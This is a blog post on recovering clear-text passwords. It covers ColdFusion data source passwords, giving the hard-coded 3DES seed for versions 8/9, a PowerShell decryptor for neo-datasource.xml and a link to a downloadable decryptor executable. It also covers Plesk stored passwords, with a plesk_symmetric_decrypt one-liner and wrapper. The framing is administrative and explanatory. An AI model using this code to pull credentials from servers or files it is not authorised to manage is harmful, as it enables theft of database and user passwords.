ColdFusion Data Source Decryption

The Problem

Have you ever needed to decrypt the passwords stored in ColdFusion’s [ColdFusion Install Dir]\lib\neo-datasource.xml file? Whether you are migrating between servers or are just curious what that password is, it’s a pain as an admin to work around the extra layer of security.

Reverse Engineering the Passwords

From ColdFusion 8 (probably older too) through ColdFusion 9, data source passwords were stored encrypted, but under a key that never changed. Adobe hard-coded the seed “0yJ!@1$r8p0L@r1$6yJ!@1rj” (24 bytes, i.e. a complete 3DES key) into every install, encrypted each password with 3DES and stored the result Base64-encoded. The seed has been public for years, so anyone who got hold of a neo-datasource.xml or neo-query.xml file could recover every password in it without ever touching the server.

Starting with ColdFusion 10 and 11 (and presumably onward), the passwords are instead encrypted with a per-installation seed stored in the [ColdFusion Install Dir]\lib\seed.properties file. A leaked neo-datasource.xml on its own is therefore no longer enough; the attacker needs the seed as well. One caveat: seed.properties sits in the same lib directory as neo-datasource.xml, so anyone who can read one file can usually read the other. The same file also names the algorithm, which is “AES/CBC/PKCS5Padding” in most seed.properties files, suggesting Adobe left room for more than one.
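As an added worked example (this is not the author’s ColdFusion Decryptor and not Adobe’s code), here is the ColdFusion 8/9 recipe from the paragraphs above in PowerShell: Base64-decode the stored value and 3DES-decrypt it with the hard-coded seed as the key. It assumes the mode Java gives for Cipher.getInstance("DESede"), namely ECB with PKCS5 padding (.NET calls the same padding PKCS7). A matching encrypt function is included only so the embedded sample runs offline, and the walker over neo-datasource.xml assumes the WDDX layout of `<var name='DSN'><struct>…<var name='password'><string>…</string></var>…</struct></var>`; the sample packet is constructed, not a real file. The ColdFusion 10+ AES path needs the per-install seed and is not implemented here.

```powershell
# Added example (not the author's ColdFusionDecryptor): recover ColdFusion 8/9 data
# source passwords with the hard-coded seed described above.
# Assumption: CF used Java's Cipher.getInstance("DESede"), i.e. 3DES in ECB mode with
# PKCS5 padding, which .NET names PKCS7. CF10+ (per-install seed.properties, AES/CBC)
# is not handled here.

$CfSeed = '0yJ!@1$r8p0L@r1$6yJ!@1rj'   # 24 ASCII bytes = three 8-byte DES keys

function New-CfTripleDes {
    $tdes = [System.Security.Cryptography.TripleDES]::Create()
    $tdes.Key     = [System.Text.Encoding]::ASCII.GetBytes($CfSeed)
    $tdes.Mode    = [System.Security.Cryptography.CipherMode]::ECB   # no IV in this scheme
    $tdes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    return $tdes
}

function ConvertFrom-CfPassword {
    # Base64 text from <var name='password'><string>...</string></var> -> clear text
    param([Parameter(Mandatory)][string]$EncryptedBase64)
    $tdes  = New-CfTripleDes
    $bytes = [Convert]::FromBase64String($EncryptedBase64)
    try {
        $plain = $tdes.CreateDecryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
        return [System.Text.Encoding]::UTF8.GetString($plain)
    } finally { $tdes.Dispose() }
}

function ConvertTo-CfPassword {
    # Inverse of the above, present only so the sample below round-trips without a server.
    param([Parameter(Mandatory)][string]$ClearText)
    $tdes  = New-CfTripleDes
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($ClearText)
    try {
        $enc = $tdes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
        return [Convert]::ToBase64String($enc)
    } finally { $tdes.Dispose() }
}

function Get-CfDataSourcePasswords {
    # Walks a neo-datasource.xml. Assumed WDDX layout: each data source is
    # <var name='DSN'><struct>...<var name='password'><string>BASE64</string></var>...</struct></var>
    param([Parameter(Mandatory)][xml]$Xml)
    foreach ($pwVar in $Xml.SelectNodes("//var[@name='password']")) {
        $dsnVar = $pwVar.ParentNode.ParentNode          # struct -> enclosing <var name='DSN'>
        $dsn = if ($dsnVar -is [System.Xml.XmlElement]) { $dsnVar.GetAttribute('name') } else { '(unknown)' }
        $b64 = $pwVar.SelectSingleNode('string').InnerText
        $clear = if ([string]::IsNullOrEmpty($b64)) { '' } else { ConvertFrom-CfPassword $b64 }
        [pscustomobject]@{ DataSource = $dsn; Password = $clear }
    }
}

# Constructed sample packet, NOT a real neo-datasource.xml; the password value is
# produced right here with the same seed so the whole script runs offline.
$sampleXml = [xml]@"
<wddxPacket version='1.0'><header/><data><struct>
  <var name='cfartgallery'><struct>
    <var name='username'><string>cfuser</string></var>
    <var name='password'><string>$(ConvertTo-CfPassword 'Sup3rS3cret!')</string></var>
  </struct></var>
</struct></data></wddxPacket>
"@

Get-CfDataSourcePasswords $sampleXml | Format-Table -AutoSize
# Real file: Get-CfDataSourcePasswords ([xml](Get-Content -Raw "<ColdFusion Install Dir>\lib\neo-datasource.xml"))
```

The sample prints the data source name cfartgallery alongside the recovered clear text. Because the key is the same on every ColdFusion 8/9 server, nothing here depends on the machine the file came from, which is exactly the weakness the paragraph describes.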

Further Reading

While the encryption is “better” in ColdFusion 10 and later, we must always remember that some things cannot be protected. Take the effort to encrypt DVDs: the DVD player has to decrypt the disc to show it to you, so the player necessarily holds the means to decrypt it. Similarly, ColdFusion has to decrypt a data source password to open the connection to the database, so the means to decrypt every stored password must be present on the server. This will not change; it is only a matter of time and effort before each new scheme is reverse-engineered.

My Solution

Since encryption can be confusing (I won’t judge Adobe/ColdFusion’s popularity here), there seems to be no easy way for an admin to decrypt these passwords. This is where my ColdFusion Decryptor program comes in. Simply feed it a single password, or an entire neo-datasource.xml file, and it spits out the decrypted information for you. You’re welcome =)


ColdFusion Decryptor

Download Link: https://api.waycool.tech/ColdFusionDecryptor.exe

To use the ColdFusion Decryptor, you first need to know which version of ColdFusion you are decrypting for. If it’s 10 or higher, first fill in the ColdFusion 10+ Seed box with the seed from your seed.properties file. Once this is done, you can either input a single encrypted string from the neo-datasource.xml file or select the whole damn neo-datasource.xml file, your choice =). After selecting a file it will automatically be parsed. Please note that the only supported algorithm for ColdFusion 10 or newer is “AES/CBC/PKCS5Padding” (you can find your algorithm in the seed.properties file).

This should work to decrypt ColdFusion passwords from Windows or Linux servers.

It’s that simple. Have fun! As is, no warranties. No whining.

Plesk Password Encryption on Windows

Plesk Encryption

Plesk, love it or hate it, is the most popular control panel used on Windows servers. I’ve had the unfortunate experience of working with the panel since Plesk 8. Fortunately, it has improved over the years and I’ve grown to like it. Over the course of its life, Plesk (v10 to be exact) finally made the choice not to store passwords in clear text. This was one of the best choices they could have made for the sake of security. However, it has made it difficult for IT admins to quickly replicate an end-user problem. So today I discuss how to bring that symmetrically encrypted password back to clear text!

If I haven’t lost you yet, here is the one-liner to get the password in the clear on a Windows OS:

"%plesk_dir%\admin\bin\php.exe" -r "echo plesk_symmetric_decrypt('ENCRYPTED_STRING_HERE');"

What does this do?

The Windows command above uses the Plesk environment variable (%plesk_dir%) plus the path to Plesk’s own PHP binary to run a one-line echo (-r means run the code without script tags) that calls Plesk’s own function, plesk_symmetric_decrypt, on the stored value. In short, replace the text ‘ENCRYPTED_STRING_HERE’ with the password column value from Plesk’s database and the clear text is written to the command line output. Two caveats: pasting the value inside the quotes means a stray single or double quote in it will break the PHP, and the clear text lands in your console (and the encrypted value in your shell history), so treat the session accordingly. WayCool, huh?

Additional Information

There are a few things to note regarding this:

  1. The command must be executed on the same server the encrypted string was taken from, since the symmetric key is specific to that installation.
  2. Only passwords of type ‘sym’ (symmetric-key) can be decrypted with this function.
  3. Passwords of type ‘crypt’ cannot be reverse-engineered (as far as I’m aware). These use PHP’s crypt() function, explained here, and will likely start with ‘$5$’ in Plesk’s database (the prefix of a SHA-256 crypt hash).

If you are unsure where in Plesk’s database the passwords are stored, try using HeidiSQL (or Plesk’s dbclient.exe command) and browsing the sys_users and databaseservers tables, which link back to the accounts table by account_id.
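Here is an added PowerShell wrapper around the one-liner above; it is not Plesk’s code and was not part of the original post. Instead of pasting the stored value into the -r code string, it hands the value to PHP as a separate command-line argument and reads it back through $argv[1], so a quote or ‘$’ in the value cannot break or alter the PHP that runs, and it refuses ‘crypt’ rows up front. It assumes %plesk_dir% is set (as the one-liner does), that plesk_symmetric_decrypt exists in Plesk’s PHP build, and that the rows come from sys_users joined to accounts on account_id with columns named login, type and password (the column names and the two sample rows are constructed for the example).

```powershell
# Added example (not from the original post, not Plesk's code): a wrapper around
#   "%plesk_dir%\admin\bin\php.exe" -r "echo plesk_symmetric_decrypt('...');"
# The stored value is passed to PHP as an argument and read back via $argv[1], so it
# is never spliced into the code string. Runs only on the Plesk server itself.

function ConvertFrom-PleskPassword {
    param(
        [Parameter(Mandatory)][string]$Encrypted,
        [Parameter(Mandatory)][string]$Type            # accounts.type: 'sym' or 'crypt'
    )
    if ($Type -eq 'crypt') {
        throw 'type ''crypt'' is a one-way hash (PHP crypt(), typically $5$...); nothing to decrypt'
    }
    if ($Type -ne 'sym') { throw "unsupported password type '$Type'" }
    if (-not $env:plesk_dir) { throw 'plesk_dir is not set; run this on the Plesk server' }

    $php = Join-Path $env:plesk_dir 'admin\bin\php.exe'
    if (-not (Test-Path $php)) { throw "Plesk PHP not found at $php" }

    # Single quotes: PowerShell must not expand $argv. PHP fills $argv[1] from the first
    # argument after '--' (the '--' stops php.exe treating a leading '-' as an option).
    $code  = 'echo plesk_symmetric_decrypt($argv[1]);'
    $clear = & $php '-r' $code '--' $Encrypted
    if ($LASTEXITCODE -ne 0) { throw "php.exe exited with code $LASTEXITCODE" }
    return ($clear -join '')
}

# Constructed stand-in for rows pulled with HeidiSQL or dbclient.exe from sys_users
# joined to accounts on account_id (column names login/type/password are assumed).
$rows = @(
    [pscustomobject]@{ login = 'ftp_user1'; type = 'sym';   password = '<paste accounts.password value here>' },
    [pscustomobject]@{ login = 'ftp_user2'; type = 'crypt'; password = '$5$<salt>$<hash>' }
)
foreach ($r in $rows) {
    try   { '{0}: {1}' -f $r.login, (ConvertFrom-PleskPassword -Encrypted $r.password -Type $r.type) }
    catch { '{0}: skipped ({1})' -f $r.login, $_.Exception.Message }
}
```

Run off the server, both sample rows are reported as skipped (no plesk_dir, and a crypt hash); on the Plesk server the ‘sym’ row prints its clear text. If plesk_symmetric_decrypt rejects a value it echoes nothing, so an empty result means the input was not a valid ‘sym’ string for that server. The clear text still goes to your console and the encrypted value into your PowerShell history, so clear the history when you are done.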


If you have any thoughts on this, be WayCool and drop a comment below!


–Devin